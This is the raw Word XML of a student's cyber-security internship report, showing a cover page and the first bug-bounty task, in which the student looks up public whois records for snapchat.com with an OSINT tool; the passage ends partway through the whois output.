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3.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b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="false" relativeHeight="2" behindDoc="true" locked="false" layoutInCell="true" allowOverlap="true">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>457200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>518795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6871648" cy="9081316"/>
                <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
                <wp:wrapNone/>
                <wp:docPr id="1026" name="Group 19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871648" cy="9081316"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6864824" cy="9123528"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm rot="0">
                            <a:off x="0" y="0"/>
                            <a:ext cx="6858000" cy="1371600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:solidFill>
                            <a:srgbClr val="5b9bd5"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr>
                          <a:prstTxWarp prst="textNoShape"/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm rot="0">
                            <a:off x="0" y="4094328"/>
                            <a:ext cx="6858000" cy="5029200"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:solidFill>
                            <a:srgbClr val="5b9bd5"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx id="1028">
                          <w:txbxContent>
                            <w:p>
                              <w:pPr>
                                <w:pStyle w:val="style157"/>
                                <w:spacing w:before="120"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t>Report on project</w:t>
                              </w:r>
                            </w:p>
                            <w:p>
                              <w:pPr>
                                <w:pStyle w:val="style157"/>
                                <w:spacing w:before="120"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t xml:space="preserve">BY </w:t>
                              </w:r>
                            </w:p>
                            <w:p>
                              <w:pPr>
                                <w:pStyle w:val="style157"/>
                                <w:spacing w:before="120"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t xml:space="preserve">    </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                  <w:lang w:val="en-US"/>
                                </w:rPr>
                                <w:t xml:space="preserve">KANDAKATLA MOHAN KUMAR </w:t>
                              </w:r>
                            </w:p>
                            <w:p>
                              <w:pPr>
                                <w:pStyle w:val="style157"/>
                                <w:spacing w:before="120"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t xml:space="preserve">  </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t>Regd</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t>No :</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                  <w:lang w:val="en-US"/>
                                </w:rPr>
                                <w:t>21995A0241</w:t>
                              </w:r>
                            </w:p>
                            <w:p>
                              <w:pPr>
                                <w:pStyle w:val="style157"/>
                                <w:spacing w:before="120"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="ffffff"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                  <w:lang w:val="en-US"/>
                                </w:rPr>
                                <w:t xml:space="preserve">AVANTHI'S ST TERESSA INSTITUTE OF ENGINEERING AND TECHNOLOGY </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr lIns="457200" rIns="457200" tIns="731520" bIns="457200" vert="horz" anchor="b" wrap="square">
                          <a:prstTxWarp prst="textNoShape"/>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm rot="0">
                            <a:off x="6824" y="1371600"/>
                            <a:ext cx="6858000" cy="2722728"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx id="1029">
                          <w:txbxContent>
                            <w:p>
                              <w:pPr>
                                <w:pStyle w:val="style157"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
                                  <w:caps/>
                                  <w:color w:val="5b9bd5"/>
                                  <w:sz w:val="72"/>
                                  <w:szCs w:val="72"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
                                  <w:caps/>
                                  <w:color w:val="5b9bd5"/>
                                  <w:sz w:val="72"/>
                                  <w:szCs w:val="72"/>
                                </w:rPr>
                                <w:t xml:space="preserve">documentation on Cyber security  </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr lIns="457200" rIns="457200" tIns="91440" bIns="91440" vert="horz" anchor="ctr" wrap="square">
                          <a:prstTxWarp prst="textNoShape"/>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
                <wp14:sizeRelH relativeFrom="page">
                  <wp14:pctWidth>0</wp14:pctWidth>
                </wp14:sizeRelH>
                <wp14:sizeRelV relativeFrom="page">
                  <wp14:pctHeight>0</wp14:pctHeight>
                </wp14:sizeRelV>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group id="1026" filled="f" stroked="f" style="position:absolute;margin-left:36.0pt;margin-top:40.85pt;width:541.07pt;height:715.06pt;z-index:-2147483645;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page;mso-wrap-distance-left:0.0pt;mso-wrap-distance-right:0.0pt;visibility:visible;" coordsize="6864824,9123528">
                <v:rect id="1027" fillcolor="#5b9bd5" stroked="f" style="position:absolute;left:0;top:0;width:6858000;height:1371600;z-index:2;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-relative:page;mso-height-relative:page;visibility:visible;">
                  <v:stroke on="f"/>
                  <v:fill/>
                </v:rect>
                <v:rect id="1028" fillcolor="#5b9bd5" stroked="f" style="position:absolute;left:0;top:4094328;width:6858000;height:5029200;z-index:3;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-relative:page;mso-height-relative:page;visibility:visible;v-text-anchor:bottom;">
                  <v:stroke on="f"/>
                  <v:fill/>
                  <v:textbox inset="36.0pt,57.6pt,36.0pt,36.0pt">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="style157"/>
                          <w:spacing w:before="120"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                          <w:t>Report on project</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="style157"/>
                          <w:spacing w:before="120"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                          <w:t xml:space="preserve">BY </w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="style157"/>
                          <w:spacing w:before="120"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                          <w:t xml:space="preserve">    </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                            <w:lang w:val="en-US"/>
                          </w:rPr>
                          <w:t xml:space="preserve">KANDAKATLA MOHAN KUMAR </w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="style157"/>
                          <w:spacing w:before="120"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                          <w:t xml:space="preserve">  </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                          <w:t>Regd</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                          <w:t>No :</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                            <w:lang w:val="en-US"/>
                          </w:rPr>
                          <w:t>21995A0241</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="style157"/>
                          <w:spacing w:before="120"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="ffffff"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                            <w:lang w:val="en-US"/>
                          </w:rPr>
                          <w:t xml:space="preserve">AVANTHI'S ST TERESSA INSTITUTE OF ENGINEERING AND TECHNOLOGY </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="1029" fillcolor="white" stroked="f" style="position:absolute;left:6824;top:1371600;width:6858000;height:2722728;z-index:4;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-relative:page;mso-height-relative:page;visibility:visible;v-text-anchor:middle;">
                  <v:stroke on="f"/>
                  <v:fill/>
                  <v:textbox inset="36.0pt,7.2pt,36.0pt,7.2pt">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="style157"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
                            <w:caps/>
                            <w:color w:val="5b9bd5"/>
                            <w:sz w:val="72"/>
                            <w:szCs w:val="72"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
                            <w:caps/>
                            <w:color w:val="5b9bd5"/>
                            <w:sz w:val="72"/>
                            <w:szCs w:val="72"/>
                          </w:rPr>
                          <w:t xml:space="preserve">documentation on Cyber security  </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:fill/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>DAY -1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Bug Bounty</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Task -1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -1 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>First open a browser then search Bug Bounty Program as a vulnerable website</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step -2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>In this step I select a website(Snapchat) now find that domain name of the website.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -3 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I choose snapchat.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -4 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Now open OSNIT Framework in new tab </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step -5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Domain name -&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> records –&gt; Domain Dossier it will give some information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style3"/>
        <w:spacing w:before="600" w:lineRule="auto" w:line="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002b82"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002b82"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Domain Whois record</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style94"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Queried </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="style4125"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002b82"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>whois.internic.net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> with "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="style4125"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002b82"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="style4125"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002b82"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> snapchat.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Domain Name: SNAPCHAT.COM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Registry Domain ID: 1704543145_DOMAIN_COM-VRSN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Registrar WHOIS Server: whois.markmonitor.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Registrar URL: http://www.markmonitor.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Updated Date: 2018-03-28T20:34:03Z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Creation Date: 2012-02-28T19:29:26Z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Registry Expiry Date: 2026-02-28T19:29:26Z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
